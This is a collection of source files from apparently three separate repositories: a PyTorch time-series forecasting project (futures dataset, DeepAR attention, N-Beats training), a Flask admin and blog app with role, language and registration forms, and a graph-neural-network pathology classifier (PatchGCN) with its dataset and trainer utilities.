"source": "Jin-Xi/TS-Forecasting",
"score": 3
} |
#### File: data/datasets/futures.py
```python
import torch
import torch.utils
from torch.utils.data import Dataset, DataLoader
import pandas as pd
from typing import *
from utils.plot_pred_real import plot_pred_and_real
from sklearn.preprocessing import MinMaxScaler, StandardScaler
class futures(Dataset):
def __init__(self, root: str = "../Corn.csv", target_col: str = "volume",
input_len: int = 50, output_len: int = 5, step: int = -1,
data_type: str = "train", split_rate: float = 0.9, is_scale=True):
self.input_len = input_len
self.output_len = output_len
self.is_scale = is_scale
self.raw_data = self.read_data(root, target_col)
train_len = int(len(self.raw_data) * split_rate)
test_len = vali_len = int((1 - split_rate) * len(self.raw_data) * 0.5)
        # initialize a scaler
self.scaler = StandardScaler()
if is_scale:
self.raw_data = self.scaler.fit_transform(self.raw_data.reshape(-1, 1)).reshape(-1)
if data_type == "train":
self.data = self.raw_data[:train_len]
self.step = 1 if step == -1 else step
if data_type == "test":
self.data = self.raw_data[train_len:train_len+test_len]
self.step = self.output_len if step == -1 else step
if data_type == "vali":
self.data = self.raw_data[train_len+vali_len:train_len+test_len+vali_len]
self.step = self.output_len if step == -1 else step
def read_data(self, root: str, target_col: str):
df = pd.read_csv(root)
data = df[target_col].values
return data
def __getitem__(self, index):
start_index = self.step * index
end_index = start_index + self.input_len + self.output_len
window = self.data[start_index: end_index]
input_data = window[:self.input_len]
output_data = window[self.input_len:]
# if self.is_scale:
# input_data = self.scaler.fit_transform(input_data.reshape(-1, 1)).reshape(-1)
# output_data = self.scaler.fit_transform(output_data.reshape(-1, 1)).reshape(-1)
input_data = torch.tensor(input_data, dtype=torch.float)
output_data = torch.tensor(output_data, dtype=torch.float)
return input_data.float(), output_data.float()
def __len__(self):
return (len(self.data) - self.output_len - self.input_len) // self.step
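    # Window layout example (illustrative): with input_len=30, output_len=10 and step=1,
    # item 0 spans raw indices [0, 40); the first 30 points form the input and the
    # remaining 10 points form the target.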
if __name__ == '__main__':
train_dataset = futures(root='../Corn.csv', input_len=30, output_len=10,
split_rate=0.98, data_type='train')
train_dataloader = DataLoader(train_dataset, batch_size=1, shuffle=True)
vali_dataset = futures(root='../Corn.csv', input_len=20, output_len=10,
split_rate=0.98, data_type='vali')
vali_dataloader = DataLoader(vali_dataset, batch_size=1, shuffle=False)
outputs = []
for input_data, output_data in vali_dataloader:
outputs.append(output_data)
outputs = torch.cat(outputs, dim=1).cpu().detach().numpy().reshape(-1)
vali_loss = plot_pred_and_real(outputs, outputs, 1)
```
#### File: data/datasets/time_series.py
```python
from torch.utils.data import Dataset, DataLoader
from matplotlib import pyplot as plt
import torch
from torch import Tensor
import numpy as np
from sklearn.preprocessing import MinMaxScaler
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
"""
Utility functions
"""
def plot_series(time, series, format="-", start=0, end=None):
plt.plot(time[start:end], series[start:end], format)
plt.xlabel("Time")
plt.ylabel("Value")
plt.grid(True)
def trend(time, slope=0.):
return slope * time
def seasonal_pattern(season_time):
"""Just an arbitrary pattern, you can change it if you wish"""
return np.where(season_time < 0.4,
np.cos(season_time * 2 * np.pi),
1 / np.exp(3 * season_time))
def seasonality(time, period, amplitude=1, phase=0):
"""Repeats the same pattern at each period"""
season_time = ((time + phase) % period) / period
return amplitude * seasonal_pattern(season_time)
def noise(time, noise_level=1, seed=None):
rnd = np.random.RandomState(seed)
return rnd.randn(len(time)) * noise_level
"""
Dataset definitions
"""
class time_series(Dataset):
def __init__(self, input_len=50, pred_len=10, type='train'):
self.window_size = input_len + pred_len
self.pred_len = pred_len
self.type = type
self.input_len = input_len
self.series, self.split_time, self.x_train, self.x_valid, self.time_train, self.time_valid = self.init_data()
if type == 'train':
self.data = self.x_train
self.time = self.time_train
self.step = 1
if type == 'test':
self.data = self.x_valid
self.time = self.time_valid
self.step = self.pred_len
def init_data(self):
time = np.arange(4 * 365 + 1, dtype="float32")
baseline = 10
series = trend(time, 0.1)
baseline = 10
amplitude = 40
slope = 0.05
noise_level = 5
# Create the series
series = baseline + trend(time, slope) + seasonality(time, period=365, amplitude=amplitude)
# Update with noise
series += noise(time, noise_level, seed=42)
split_time = 1000
time_train = time[:split_time]
x_train = series[:split_time]
time_valid = time[split_time:]
x_valid = series[split_time:]
return series, split_time, x_train, x_valid, time_train, time_valid
def __getitem__(self, index):
start = index * self.step
end = start + self.window_size
window = self.data[start:end]
input_tensor = torch.tensor(window[:self.input_len, None])
target_tensor = torch.tensor(window[self.input_len:, None])
return torch.squeeze(input_tensor), torch.squeeze(target_tensor)
def __len__(self):
return (len(self.data) - self.window_size) // self.step
class time_series2(Dataset):
def __init__(self, input_len=50, pred_len=10, type='train'):
self.window_size = input_len + pred_len
self.pred_len = pred_len
self.type = type
self.input_len = input_len
self.scalar = MinMaxScaler(feature_range=(-1, 1))
self.series, self.split_time, self.x_train, self.x_valid, self.time_train, self.time_valid = self.init_data()
if type == 'train':
self.data = self.x_train
self.time = self.time_train
self.step = 1
if type == 'test':
self.data = self.x_valid
self.time = self.time_valid
self.step = self.pred_len
def init_data(self):
time = np.arange(4 * 365 + 1, dtype="float32")
baseline = 10
series = trend(time, 0.1)
baseline = 10
amplitude = 40
slope = 0.05
noise_level = 5
# Create the series
series = baseline + trend(time, slope) + seasonality(time, period=365, amplitude=amplitude)
# Update with noise
series += noise(time, noise_level, seed=42)
# series = self._data_trainform(series)
split_time = 1000
time_train = time[:split_time]
x_train = series[:split_time]
time_valid = time[split_time:]
x_valid = series[split_time:]
return series, split_time, x_train, x_valid, time_train, time_valid
def __getitem__(self, index):
start = index * self.step
end = start + self.window_size
window = self.data[start:end]
input_tensor = torch.tensor(window[:self.input_len, None])
target_tensor = torch.tensor(window[self.input_len:, None])
return torch.squeeze(input_tensor), torch.squeeze(target_tensor)
def __len__(self):
return (len(self.data) - self.window_size) // self.step
def _data_trainform(self, data):
return torch.tensor(self.scalar.fit_transform(data.reshape(-1, 1)).reshape(-1))
def _data_reverse_transform(self, data: Tensor):
return torch.tensor(self.scalar.inverse_transform(data.numpy().reshape(-1, 1)).reshape(-1))
if __name__ == "__main__":
dataset = time_series2()
```
#### File: TS-Forecasting/model/DeepAR_Attn.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import random
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class EncoderRNN(nn.Module):
    def __init__(self, input_size=1, hidden_size=10, num_layers=1):
        super(EncoderRNN, self).__init__()
        self.hidden_size = hidden_size
        self.num_layers = num_layers
        # project the raw input up to the hidden size before feeding the GRU
        self.embedding = nn.Linear(input_size, hidden_size)
        self.gru = nn.GRU(hidden_size, hidden_size, batch_first=True, num_layers=num_layers)
        self.norm = nn.InstanceNorm1d(hidden_size)
def forward(self, x, hidden):
embedded = self.embedding(x)
output = embedded
output = self.norm(output)
output, hidden = self.gru(output, hidden)
return output, hidden
    def initHidden(self, batch_size):
        return torch.zeros(self.num_layers, batch_size, self.hidden_size, device=device)
class AttnDecoderRNN(nn.Module):
def __init__(self, hidden_size=40, output_size=1, input_len=50, dropout_p=0.1, num_layers=1):
super(AttnDecoderRNN, self).__init__()
self.hidden_size = hidden_size
self.output_size = output_size
self.dropout_p = dropout_p
self.input_len = input_len
self.use_layer_combine = True if num_layers > 1 else False
self.embedding = nn.Linear(self.output_size, self.hidden_size)
self.layer_combine = nn.Linear(num_layers * self.hidden_size, self.hidden_size)
self.attn = nn.Linear(self.hidden_size * 2, self.input_len)
self.attn_combine = nn.Linear(self.hidden_size * 2, self.hidden_size)
self.dropout = nn.Dropout(self.dropout_p)
self.gru = nn.GRU(self.hidden_size, self.hidden_size, num_layers=num_layers, batch_first=True)
self.out = nn.Linear(self.hidden_size, self.output_size)
self.norm = nn.InstanceNorm1d(hidden_size)
def forward(self, x, hidden, encoder_outputs):
raw_hidden = hidden
embedded = self.embedding(x)
embedded = self.norm(embedded)
embedded = self.dropout(embedded)
        # merge the hidden states across layers when the GRU has more than one layer
if self.use_layer_combine:
hidden = hidden.permute(1, 0, 2)
hidden = self.layer_combine(hidden)
else:
hidden = hidden.permute(1, 0, 2)
attn_weights = F.softmax(self.attn(torch.cat((embedded, hidden), 2)), dim=2)
attn_applied = torch.bmm(attn_weights,
encoder_outputs)
output = torch.cat((embedded, attn_applied), dim=2)
output = self.attn_combine(output)
output = F.relu(output)
output, hidden = self.gru(output, raw_hidden)
output = self.out(output)
return output, hidden, attn_weights
def initHidden(self):
return torch.zeros(1, 1, self.hidden_size, device=device)
class DeepAR_Attn(nn.Module):
def __init__(self, input_size=1, output_size=1, hidden_size=128, input_len=50, pred_len=10):
super(DeepAR_Attn, self).__init__()
self.encoder = EncoderRNN(input_size=input_size, hidden_size=hidden_size)
self.decoder = AttnDecoderRNN(hidden_size=hidden_size, output_size=output_size,
input_len=input_len)
self.input_len = input_len
self.pred_len = pred_len
self.Attn = None
def forward(self, input_tensor, target_tensor):
batch_size = input_tensor.size(0)
input_size = input_tensor.size(2)
encoder_hidden = self.encoder.initHidden(batch_size)
input_length = input_tensor.size(1)
target_length = target_tensor.size(1)
encoder_outputs = torch.zeros(batch_size, input_length, self.encoder.hidden_size, device=device)
for ei in range(input_length):
encoder_output, encoder_hidden = self.encoder(input_tensor[:, ei, None], encoder_hidden)
encoder_outputs[:, ei:ei + 1, :] = encoder_output
decoder_input = input_tensor[:, -1, :].unsqueeze(1)
decoder_hidden = encoder_hidden
teacher_forcing_ratio = 0.5
use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False
decoder_outputs = []
if use_teacher_forcing:
# Teacher forcing: Feed the target as the next input
for di in range(target_length):
decoder_output, decoder_hidden, attn_weights = self.decoder(decoder_input, decoder_hidden, encoder_outputs)
# loss += criterion(decoder_output, target_tensor[di])
decoder_outputs.append(decoder_output)
decoder_input = target_tensor[:, di:di + 1, :] # Teacher forcing
else:
# Without teacher forcing: use its own predictions as the next input
for di in range(target_length):
decoder_output, decoder_hidden, attn_weights = self.decoder(decoder_input, decoder_hidden, encoder_outputs)
decoder_outputs.append(decoder_output)
decoder_outputs = torch.cat(decoder_outputs, dim=1)
return decoder_outputs
def init_hidden(self, batch_size):
return self.encoder.initHidden(batch_size)
if __name__ == '__main__':
    # TODO: test the basic model
pass
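    # Illustrative smoke test (hypothetical shapes): one forward pass on random
    # tensors to check that the model wiring produces a (batch, pred_len, 1) output.
    model = DeepAR_Attn(input_size=1, output_size=1, hidden_size=128, input_len=50, pred_len=10).to(device)
    x = torch.randn(4, 50, 1, device=device)
    y = torch.randn(4, 10, 1, device=device)
    out = model(x, y)
    print(out.shape)  # expected: torch.Size([4, 10, 1])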
```
#### File: Jin-Xi/TS-Forecasting/NBeats_forecasting.py
```python
import logging
from tqdm import tqdm
from torch.utils.data import DataLoader
import torch
from torch import optim
# from utils.losses import smape_2_loss, mape_loss, mase_loss
from model.N_Beats import NBeatsNet
from data.datasets.time_series import time_series
from data.datasets.futures import futures
from utils.test_model import test_NBeats as test
"""
train_N-Beats!
"""
torch.manual_seed(888)
logger = logging.getLogger('DeepAR.Net')
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def train(model, input_len, output_len):
optimizer = optim.Adam(model.parameters(), lr=0.001)
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, verbose=True)
# losses_dict = {"MAPE": mape_loss, "MASE": mase_loss, "SMAPE": smape_2_loss}
loss_fn = torch.nn.MSELoss()
# train_dataset = time_series(input_len=input_len, pred_len=output_len, type='train')
# train_dataloader = DataLoader(train_dataset, batch_size=4, shuffle=True)
# vali_dataset = time_series(input_len=input_len, pred_len=output_len, type='test')
# vali_dataloader = DataLoader(vali_dataset, batch_size=1, shuffle=False)
train_dataset = futures(root='./data/Corn.csv', input_len=input_len, output_len=output_len,
split_rate=0.8, data_type='train')
train_dataloader = DataLoader(train_dataset, batch_size=16, shuffle=True)
vali_dataset = futures(root='./data/Corn.csv', input_len=input_len, output_len=output_len,
split_rate=0.8, data_type='vali')
vali_dataloader = DataLoader(vali_dataset, batch_size=1, shuffle=False)
global_step = 0
for epoch in range(10000):
count = 0
total_loss = 0
model.train()
train_bar = tqdm(train_dataloader)
for input, target in train_bar:
input = input.cuda()
target = target.cuda()
optimizer.zero_grad()
backcast, forecast = model(input)
loss = loss_fn(forecast, target)
loss.backward()
total_loss += loss.item()
count += 1
global_step += 1
optimizer.step()
if count % 100 == 0:
total_loss /= count
                    train_bar.desc = '[training] epoch[{}/{}], iter[{}], loss[{}]'.format(
                        epoch, 10000, global_step, total_loss)
count = 0
total_loss = 0
if epoch % 5 == 0:
vali_loss = test(model, epoch, vali_dataloader)
scheduler.step(vali_loss)
if __name__ == "__main__":
    # do not set these too large unless the dataset is long enough
input_len = 50
output_len = 5
model = NBeatsNet(backcast_length=input_len, forecast_length=output_len,
stack_types=(NBeatsNet.SEASONALITY_BLOCK, NBeatsNet.TREND_BLOCK, NBeatsNet.GENERIC_BLOCK),
nb_blocks_per_stack=3,
thetas_dim=(4, 4, 4), share_weights_in_stack=False, hidden_layer_units=64)
train(model, input_len, output_len)
``` |
{
"source": "jinxiu89/uwget",
"score": 2
} |
#### File: admin/system/language.py
```python
from app.admin import admin
from flask import render_template, request, jsonify, session
from app.forms.language.form import Form
from app.modules.Language import Language
from app.utils.admin.common import packing_error
from app.admin.decorate import require_login
@admin.route('/language', methods=['GET', 'POST'])
@require_login
def admin_language_list():
if request.method == "GET":
data, count = Language.all()
return render_template('admin/language/index.html', data=data, count=count)
@admin.route('/language/add', methods=['GET', 'POST'])
@require_login
def admin_language_add():
form = Form()
if request.method == "GET":
return render_template('admin/language/add.html', form=form)
if request.method == "POST":
if form.validate_on_submit():
result = form.create()
return jsonify(result)
else:
error = packing_error(form.errors)
return jsonify({'status': False, 'message': str(error)})
@admin.route('/language/edit/<int:id>', methods=['GET', 'POST'])
@require_login
def admin_language_edit(id):
form = Form()
data = Language.by_id(id)
if request.method == "GET":
form.name.data = data.name
form.code.data = data.code
form.status.data = data.status
return render_template('admin/language/edit.html', form=form, data=data)
if request.method == "POST":
if form.validate_on_submit():
result = form.update(data)
return jsonify(result)
else:
error = packing_error(form.errors)
return jsonify({'status': False, 'message': str(error)})
@admin.route('/language/stop/<int:id>', methods=['GET', 'POST'])
@require_login
def admin_language_stop(id):
if request.method == "GET":
data = Language.by_id(id)
data.status = 2
result = Language.change_status(data)
return jsonify(result)
@admin.route('/language/start/<int:id>', methods=['GET', 'POST'])
@require_login
def admin_language_start(id):
if request.method == "GET":
data = Language.by_id(id)
data.status = 1
result = Language.change_status(data)
return jsonify(result)
```
#### File: admin/system/role.py
```python
from app.admin import admin
from flask import render_template, request, jsonify, session, url_for
from app.modules.Roles import Roles
from app.modules.PermissionGroup import PermissionGroup as Group
from app.utils.admin.common import packing_error
from app.forms.permission.Role import RoleForm
from app.admin.decorate import require_login
@admin.route('/permission/role', methods=['GET', 'POST'])
@require_login
def admin_permission_role():
if request.method == 'GET':
data, count = Roles.all()
return render_template('admin/permission/role.html', data=data, count=count)
@admin.route('/permission/role/add', methods=['GET', 'POST'])
@require_login
def admin_permission_role_add():
form = RoleForm()
if request.method == 'GET':
return render_template('admin/permission/add_role.html', form=form)
if request.method == 'POST':
if form.validate_on_submit():
result = form.create()
return jsonify(result)
else:
error = packing_error(form.errors)
return jsonify({'status': False, 'message': str(error)})
@admin.route('/permission/role/edit/<int:id>', methods=['GET', 'POST'])
@require_login
def admin_permission_role_edit(id):
form = RoleForm()
data = Roles.by_id(id)
if request.method == "GET":
form.name.data = data.name
return render_template('admin/permission/edit_role.html', form=form, data=data)
if request.method == "POST":
if form.validate_on_submit():
result = form.update(data)
return jsonify(result)
else:
error = packing_error(form.errors)
return jsonify({'status': False, 'message': str(error)})
@admin.route('/permission/role/setting/<int:id>', methods=['GET', 'POST'])
@require_login
def admin_set_permission(id):
group = Group.with_permission()
return render_template('admin/permission/set_permission.html', group=group)
```
#### File: forms/permission/Role.py
```python
import time
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
from app.modules.Base import db
from app.modules.Roles import Roles
class RoleForm(FlaskForm):
name = StringField(label="角色名称", validators=[DataRequired('名称必须输入')], description="角色名称",
render_kw={"id": "name", "class": "input-text size-L", "placeholder": "按照网站功能来切分角色"})
submit = SubmitField(render_kw={"class": "button btn btn-primary radius size-L", 'type': 'button', "value": "提交"})
def create(self):
data = Roles(
name=self.name.data
)
try:
db.session.add(data)
db.session.commit()
return {'status': True, 'message': "创建成功"}
except Exception as e:
db.session.rollback()
return {'status': False, 'message': str(e)}
def update(self, data):
data.name = self.name.data
data.update_time = int(time.time())
try:
db.session.add(data)
db.session.commit()
return {'status': True, 'message': '保存成功'}
        except Exception as e:
            db.session.rollback()
            return {'status': False, 'message': str(e)}
```
#### File: forms/user/reg.py
```python
import uuid
from werkzeug.security import generate_password_hash
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms import StringField, SubmitField, IntegerField
from wtforms.validators import DataRequired, length, Email, equal_to
from app.modules.Base import db
from app.modules.UserInfo import UserInfo
from app.modules.UserAuths import UserAuth
class RegForm(FlaskForm):
email = StringField(
label="邮箱",
validators=[DataRequired('请输入用户邮箱')],
description="邮箱",
render_kw={
"id": "email",
"class": "input-text size-L",
"placeholder": "<EMAIL>"
}
)
password = StringField(
label="输入密码",
validators=[DataRequired("请输入密码")],
description="密码",
render_kw={
"type": "password",
"class": "input-text size-L",
"id": "password",
"autocomplete": "off",
"placeholder": "密码"
}
)
repassword = StringField(
label="重输密码",
validators=[DataRequired("请输入密码")],
description="验证密码",
render_kw={
"type": "password",
"class": "input-text size-L",
"id": "repassword",
"autocomplete": "off",
"placeholder": "重输密码"
}
)
submit = SubmitField(
render_kw={"class": "btn button btn-primary btn-block radius size-L", 'type': 'button',
"value": " 注 册 "})
def create(self):
User = db.session.query(UserInfo).filter(UserInfo.email == self.email.data).first()
if User is None:
user = UserInfo(
email=self.email.data,
uuid=uuid.uuid4().hex[0:16:2]
)
user.user_auth = [UserAuth(third_type='local',
access_token=generate_password_hash(self.password.data))]
try:
db.session.add(user)
db.session.commit()
except Exception as e:
db.session.rollback()
return {'status': False, 'message': str(e)}
return {'status': True, 'message': "注册成功"}
else:
return {'status': False, 'message': "不能注册!"}
```
#### File: frontend/home/index.py
```python
from app.frontend import frontend
from flask import render_template
from app.modules.Posts import Posts
@frontend.route('/', methods=['GET'])
def frontend_index():
data, count = Posts.all()
return render_template('frontend/home/index.html', data=data, count=count)
@frontend.route('/index', methods=['GET'])
def frontend_index_():
data, count = Posts.all()
return render_template('frontend/home/index.html', data=data, count=count)
```
#### File: frontend/post/details.py
```python
from app.frontend import frontend
from flask import render_template, request, jsonify
from app.utils.admin.common import packing_error
from app.modules.Posts import Posts
from app.forms.posts.form import Comment
@frontend.route('/post/<string:title>.html', methods=['GET', 'POST'])
def frontend_post_details(title):
form = Comment()
if request.method == 'GET':
result = Posts.by_title(title)
return render_template('frontend/post/details.html', result=result, form=form)
if request.method == 'POST':
if form.validate_on_submit():
result = form.create()
return jsonify(result)
else:
error = packing_error(form.errors)
return jsonify({'status': False, 'message': str(error)})
```
#### File: app/libs/redis.py
```python
from redis import Redis
from config import REDIS_OPTIONS
redis = Redis(**REDIS_OPTIONS)
def get_redis_data(key):
return redis.get(key)
def set_redis_data(key, value):
redis.set(name=key, value=value, ex=600)
```
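A minimal usage sketch for the two helpers above (this assumes a Redis server reachable via the options in `config.REDIS_OPTIONS`; redis-py returns bytes unless `decode_responses=True` is configured):
```python
from app.libs.redis import set_redis_data, get_redis_data

set_redis_data("greeting", "hello")   # stored with the 600-second TTL set in the helper
value = get_redis_data("greeting")    # redis-py returns bytes by default
print(value)                          # b'hello'
```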
#### File: app/modules/Comments.py
```python
from .Base import db
from datetime import datetime
class Comments(db.Model):
"""
评论数据表设计,一问一达,当没有任何@时 to_uid 为空
"""
__tablename__ = 'comments'
id = db.Column(db.Integer, primary_key=True)
post_id = db.Column(db.Integer, db.ForeignKey('posts.id'))
uid = db.Column(db.Integer, db.ForeignKey('user_info.id'), comment='评论人')
to_uid = db.Column(db.Integer, default=None, comment='评论哪条评论')
body = db.Column(db.Text, comment='评论内容')
body_html = db.Column(db.Text, comment='转化后的评论内容')
    create_time = db.Column(db.DateTime, default=datetime.utcnow, comment='创建时间')  # pass the callable so the timestamp is evaluated per row, not at import time
status = db.Column(db.Boolean, default=False, comment='评论审核')
def __repr__(self):
data = {
"id": self.id,
"post_id": self.post_id,
"uid": self.uid,
"to_uid": self.to_uid,
"body": self.body
}
return '{}'.format(data)
``` |
{
"source": "jinxixiang/PC-TMB",
"score": 2
} |
#### File: PC-TMB/datasets/datasets.py
```python
import os
import torch
from torch.utils.data import DataLoader, Dataset
import h5py
import pandas as pd
import numpy as np
import torch
import torch.nn.functional as F
from .BatchWSI import BatchWSI
class GraphDataset(Dataset):
def __init__(self, df, labels, cfg):
super(GraphDataset, self).__init__()
self.df = df
self.labels = labels
self.cfg = cfg
self.feat_dir = cfg.Data.dataset.feat_dir
self.type_dict = cfg.Data.dataset.type_dict
self.num_type = len(self.type_dict.keys())
def __len__(self):
return len(self.df)
def get_labels(self):
return self.labels
def __getitem__(self, item):
file_name = self.df['image_id'].values[item]
pt_dir = os.path.join(self.feat_dir, f"{file_name}.pt")
feat = torch.load(pt_dir)
bag = BatchWSI.from_data_list([feat])
type = self.type_dict[self.df["type"].values[item]]
type_tensor = F.one_hot(torch.tensor([type]),
num_classes=self.num_type).squeeze()
label = torch.tensor(self.labels[item]).float()
return bag, type_tensor.float(), label.long()
```
#### File: PC-TMB/models/PatchGCN.py
```python
import torch
import torch.nn.functional as F
import torch.nn as nn
from torch.nn import Linear, LayerNorm, ReLU
from torch_geometric.nn import GCNConv, GraphConv, GatedGraphConv, GATConv, SGConv, GINConv, GENConv, DeepGCNLayer
from .model_utils import *
from topk import SmoothTop1SVM
class NormalizeFeaturesV2(object):
r"""Column-normalizes node features to sum-up to one."""
def __call__(self, data):
data.x[:, :12] = data.x[:, :12] / data.x[:, :12].max(0, keepdim=True)[0]
return data
def __repr__(self):
return '{}()'.format(self.__class__.__name__)
class NormalizeEdgesV2(object):
r"""Column-normalizes node features to sum-up to one."""
def __call__(self, data):
data.edge_attr = data.edge_attr.type(torch.cuda.FloatTensor)
data.edge_attr = data.edge_attr / data.edge_attr.max(0, keepdim=True)[0]
return data
def __repr__(self):
return '{}()'.format(self.__class__.__name__)
class PatchGCN(torch.nn.Module):
def __init__(self, input_dim=1024, num_layers=4, edge_agg='spatial',
hidden_dim=128, dropout=0.25, n_classes=4, num_types=7, k_sample=8,
instance_loss_fn=SmoothTop1SVM(n_classes=2)):
super(PatchGCN, self).__init__()
size = [input_dim, num_layers * hidden_dim, 128]
self.edge_agg = edge_agg
self.num_layers = num_layers - 1
self.n_classes = n_classes
self.fc_in = nn.Sequential(*[nn.Linear(size[0], size[2]), nn.ReLU(), nn.Dropout(0.25)])
self.layers = torch.nn.ModuleList()
for i in range(1, self.num_layers + 1):
conv = GENConv(hidden_dim, hidden_dim, aggr='softmax',
t=1.0, learn_t=True, num_layers=2, norm='layer')
norm = LayerNorm(hidden_dim, elementwise_affine=True)
act = ReLU(inplace=True)
layer = DeepGCNLayer(conv, norm, act, block='res', dropout=0.1, ckpt_grad=False)
self.layers.append(layer)
# self.path_phi = nn.Sequential(*[nn.Linear(hidden_dim*4, hidden_dim*4), nn.ReLU(), nn.Dropout(0.25)])
self.path_attention_head = Attn_Net_Gated(L=size[1], D=size[1], dropout=dropout, n_classes=n_classes)
# self.path_rho = nn.Sequential(*[nn.Linear(hidden_dim*4, hidden_dim*4), nn.ReLU(), nn.Dropout(dropout)])
self.fc_type = nn.Linear(num_types, size[2])
        bag_classifiers = [nn.Linear(size[1] + size[2], 1) for i in
                           range(n_classes)]  # use an independent linear layer to predict each class
self.classifiers = nn.ModuleList(bag_classifiers)
instance_classifiers = [nn.Linear(size[1], 2) for i in range(n_classes)]
self.instance_classifiers = nn.ModuleList(instance_classifiers)
self.k_sample = k_sample
self.instance_loss_fn = instance_loss_fn.cuda()
for m in self.modules():
if isinstance(m, nn.Linear):
nn.init.xavier_normal_(m.weight)
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm1d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
@staticmethod
def create_positive_targets(length, device):
return torch.full((length,), 1, device=device, dtype=torch.uint8).long()
@staticmethod
def create_negative_targets(length, device):
return torch.full((length,), 0, device=device, dtype=torch.uint8).long()
# instance-level evaluation for in-the-class attention branch
def inst_eval(self, A, h, classifier):
device = h.device
if len(A.shape) == 1:
A = A.view(1, -1)
# print(f"inst_eval top k: {A.shape}")
top_p_ids = torch.topk(A, self.k_sample)[1][-1]
top_p = torch.index_select(h, dim=0, index=top_p_ids)
top_n_ids = torch.topk(-A, self.k_sample, dim=1)[1][-1]
top_n = torch.index_select(h, dim=0, index=top_n_ids)
p_targets = self.create_positive_targets(self.k_sample, device)
n_targets = self.create_negative_targets(self.k_sample, device)
all_targets = torch.cat([p_targets, n_targets], dim=0)
all_instances = torch.cat([top_p, top_n], dim=0)
logits = classifier(all_instances)
all_preds = torch.topk(logits, 1, dim=1)[1].squeeze(1)
instance_loss = self.instance_loss_fn(logits, all_targets)
return instance_loss, all_preds, all_targets
# instance-level evaluation for out-of-the-class attention branch
def inst_eval_out(self, A, h, classifier):
device = h.device
if len(A.shape) == 1:
A = A.view(1, -1)
top_p_ids = torch.topk(A, self.k_sample)[1][-1]
top_p = torch.index_select(h, dim=0, index=top_p_ids)
p_targets = self.create_negative_targets(self.k_sample, device)
logits = classifier(top_p)
p_preds = torch.topk(logits, 1, dim=1)[1].squeeze(1)
instance_loss = self.instance_loss_fn(logits, p_targets)
return instance_loss, p_preds, p_targets
def forward(self, x_path, type, label=None, instance_eval=False):
# GCN convolution input: (bsz, bag_size, feat_dim) output: (bsz, bag_size, hidden_dim)
data = x_path
device = data.x.device
if self.edge_agg == 'spatial':
edge_index = data.edge_index
elif self.edge_agg == 'latent':
edge_index = data.edge_latent
edge_attr = None
x = self.fc_in(data.x)
x_ = x
x = self.layers[0].conv(x_, edge_index, edge_attr)
x_ = torch.cat([x_, x], axis=1)
for layer in self.layers[1:]:
x = layer(x, edge_index, edge_attr)
x_ = torch.cat([x_, x], axis=1)
h_path = x_
# h_path = self.path_phi(h_path)
# end of GCN
# attention network forward
A, h = self.path_attention_head(h_path)
A = torch.transpose(A, 1, 0)
A = F.softmax(A, dim=1)
# instance loss
if instance_eval:
total_inst_loss = 0.0
inst_labels = F.one_hot(label, num_classes=self.n_classes).squeeze() # binarize label
for i in range(len(self.instance_classifiers)):
inst_label = inst_labels[i].item()
classifier = self.instance_classifiers[i]
if inst_label == 1: # in-the-class:
instance_loss, preds, targets = self.inst_eval(A[i], h, classifier)
else: # out-of-the-class
continue
total_inst_loss += instance_loss
# attention pooling
M = torch.mm(A, h)
type_feature = self.fc_type(type).squeeze()
# classifier
logits = torch.empty(1, self.n_classes).float().to(device)
for c in range(self.n_classes):
M_fused = torch.cat((M[c], type_feature), dim=-1)
logits[0, c] = self.classifiers[c](M_fused)
Y_hat = torch.topk(logits, 1, dim=1)[1]
Y_prob = F.softmax(logits, dim=1)
if instance_eval:
results_dict = {'instance_loss': total_inst_loss}
else:
results_dict = {}
return logits, Y_prob, Y_hat, results_dict
```
#### File: jinxixiang/PC-TMB/trainer.py
```python
import torch
import torch.nn as nn
import torch_optimizer as optim
import pandas as pd
# customized libs
import criterions
import models
import datasets
def get_model(conf):
net = getattr(models, conf.Model.base)
return net(**conf.Model.params)
def get_loss(conf):
conf_loss = conf.Loss.base_loss
assert hasattr(nn, conf_loss.name) or hasattr(criterions, conf_loss.name)
loss = None
if hasattr(nn, conf_loss.name):
loss = getattr(nn, conf_loss.name)
elif hasattr(criterions, conf_loss.name):
loss = getattr(criterions, conf_loss.name)
    if len(conf_loss.weight) > 0:
        # put the class weights into the constructor kwargs so they actually reach the loss
        conf_loss.params["weight"] = torch.Tensor(conf_loss.weight)
return loss(**conf_loss.params)
def get_optimizer(conf):
conf_optim = conf.Optimizer
name = conf_optim.optimizer.name
if hasattr(torch.optim, name):
optimizer_cls = getattr(torch.optim, name)
else:
optimizer_cls = getattr(optim, name)
if hasattr(conf_optim, "lr_scheduler"):
scheduler_cls = getattr(torch.optim.lr_scheduler, conf_optim.lr_scheduler.name)
else:
scheduler_cls = None
return optimizer_cls, scheduler_cls
def get_dataset(conf, kfold, mode='train'):
folds_csv = pd.read_csv(conf.General.folds)
if conf.General.cross_validation:
if mode == 'train':
data_idx = folds_csv[folds_csv['fold'] != kfold].index
else:
data_idx = folds_csv[folds_csv['fold'] == kfold].index
else:
data_idx = folds_csv[folds_csv['fold'] == mode].index
name = conf.Data.dataset.name
dataset_cls = getattr(datasets, name)
dataset_ = dataset_cls(folds_csv.loc[data_idx].reset_index(drop=True),
folds_csv.loc[data_idx].reset_index(drop=True)[conf.General.target_col],
conf)
return dataset_
```
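A sketch of how the config-driven factories above might be called; the config keys are assumptions inferred from the attribute accesses in the code, and the repo's `criterions`/`models`/`datasets` packages must be importable for `trainer` to load:
```python
from addict import Dict
from trainer import get_loss, get_optimizer  # assumes repo dependencies import cleanly

conf = Dict()
conf.Loss.base_loss.name = "CrossEntropyLoss"
conf.Loss.base_loss.weight = []              # empty list -> no class weighting
conf.Loss.base_loss.params = {}
conf.Optimizer.optimizer.name = "Adam"
conf.Optimizer.lr_scheduler.name = "StepLR"

criterion = get_loss(conf)                           # nn.CrossEntropyLoss()
optimizer_cls, scheduler_cls = get_optimizer(conf)   # torch.optim.Adam, torch.optim.lr_scheduler.StepLR
```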
#### File: PC-TMB/utils/utils.py
```python
